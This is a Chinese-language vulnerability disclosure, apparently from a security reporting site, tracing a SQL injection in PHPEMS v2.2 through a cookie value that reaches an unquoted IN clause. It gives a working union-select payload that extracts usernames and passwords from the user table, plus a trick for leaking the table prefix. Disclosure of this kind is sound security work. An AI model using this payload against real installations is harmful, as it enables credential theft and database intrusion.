### 简要描述:
过滤不严导致的注入
### 详细说明:
看文件 /app/exam/app.php 272-286行
```
public function lesson()
{
$action = $this->ev->url(3);
$page = $this->ev->get('page');
switch($action)
{
case 'ajax':
switch($this->ev->url(4))
{
case 'questions':
$number = $this->ev->get('number');
if(!$number)$number = 1;
$questid = $this->ev->getCookie('questype');
$knowsid = $this->ev->getCookie('knowsid');
$questions = $this->question->getRandQuestionListByKnowid($knowsid,$questid);
```
跟下getCookie 文件/lib/ev.cls.php 81-85行
```
public function getCookie($par,$nohead = 0)
{
if(isset($this->cookie[CH.$par]))return $this->cookie[CH.$par];
elseif(isset($this->cookie[$par]) && $nohead)return $this->cookie[$par];
else return false;
}
```
从cookie中获得参数,这里的knowsid没有处理。
然后带进了这个函数getRandQuestionListByKnowid
跟一下/app/exam/cls/question.cls.php 94-105行
```
public function getRandQuestionListByKnowid($knowid,$typeid)
{
$data = array('DISTINCT questions.questionid',array('questions','quest2knows'),array("quest2knows.qkknowsid IN ({$knowid})","quest2knows.qktype = 0","quest2knows.qkquestionid = questions.questionid","questions.questiontype = '{$typeid}'","questions.questionstatus = 1"),false,false,false);
$sql = $this->sql->makeSelect($data);
$r = $this->db->fetchAll($sql);
$t = array();
foreach($r as $p)
{
$t[] = $p['questionid'];
}
return $t;
}
```
注意$data,$knowid没有单引号也没有处理。
再看下makeSelect /lib/sql.cls.php 214-282
```
public function makeSelect($selectors,$type = 1)
{
if(!is_array($selectors))return false;
$sql = "SELECT ";
if(!$selectors[0])$selectors[0] = "*";
if(is_array($selectors[0]))
{
$sql .= rtrim(implode(',',$selectors[0]),',');
}
else $sql .= $selectors[0];
$sql .= " FROM ";
if(is_array($selectors[1]))
{
$tmp = NULL;
foreach($selectors[1] as $p)
{
if($type)$tmp .= $this->tablepre.$p." AS ".$p.",";
else
$tmp .= $p." AS t ,";
}
$sql .= rtrim($tmp,',');
}
else
{
if($type)$sql .= $this->tablepre.$selectors[1]." AS ".$selectors[1];
else
$sql .= $selectors[1]." AS t";
}
$sql .= " WHERE ";
if(!$selectors[2])$selectors[2] = 1;
if(is_array($selectors[2]))
{
$sql .= rtrim(implode(' AND ',$selectors[2]),'AND ');
}
else $sql .= $selectors[2];
if($selectors[3])
{
$sql .= " GROUP BY ";
if(is_array($selectors[3]))
{
$sql .= rtrim(implode(',',$selectors[3]),',');
}
else $sql .= $selectors[3];
}
if($selectors[4])
{
$sql .= " ORDER BY ";
if(is_array($selectors[4]))
{
$sql .= rtrim(implode(',',$selectors[4]),',');
}
else $sql .= $selectors[4];
}
if($selectors[5])
{
$sql .= " LIMIT ";
if(is_array($selectors[5]))
{
$sql .= rtrim(implode(',',$selectors[5]),',');
}
else $sql .= $selectors[5];
}
elseif($selectors[5] !== false)
{
$sql .= " LIMIT 0,100";
}
return $sql;
}
```
直接生成select语句的sql,没有处理。这样就导致了注入的产生。
### 漏洞证明:
利用过程:
首先注册个用户,开一个新考场
[<img src="https://images.seebug.org/upload/201411/03233015f5aa607b6c34d1370a57e1edac2f46cf.jpg" alt="1.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/03233015f5aa607b6c34d1370a57e1edac2f46cf.jpg)
是免费的测试的。
然后访问
http://127.0.0.1/phpems_zxmnks_v2.2/index.php?exam-app-lesson-ajax-questions&number=1
抓包
[<img src="https://images.seebug.org/upload/201411/032331485a269f502af2adeedba76c3afc21e8a7.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/032331485a269f502af2adeedba76c3afc21e8a7.png)
[<img src="https://images.seebug.org/upload/201411/03233156b5ea574a35d7c82564f5cdc1d7336dbe.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/03233156b5ea574a35d7c82564f5cdc1d7336dbe.png)
输入poc
NULL) union select concat(username,0x23,userpassword) from x2_user #(
[<img src="https://images.seebug.org/upload/201411/0323320387a33380d03f45e4cd416be7e3439875.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0323320387a33380d03f45e4cd416be7e3439875.png)
那么如果数据库前缀改掉了肿么办?
http://127.0.0.1/phpems_zxmnks_v2.2/index.php?exam-app-lesson-ajax-questions&number=
直接访问这个就行了,把number参数的值去掉,就可以爆出前缀,。。。。
[<img src="https://images.seebug.org/upload/201411/03234425f5874ab5e7940802becc7296d4f75041.jpg" alt="11.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/03234425f5874ab5e7940802becc7296d4f75041.jpg)
官网的前缀不是x2,改掉了。通过这个方法爆出,然后上个图。
还有问题的函数
getRandQuestionRowsListByKnowid
getKnowsBySubjectAndAreaid
getRandQuestionList
没在仔细看了,睡觉了。。
京ICP备10040895号
暂无评论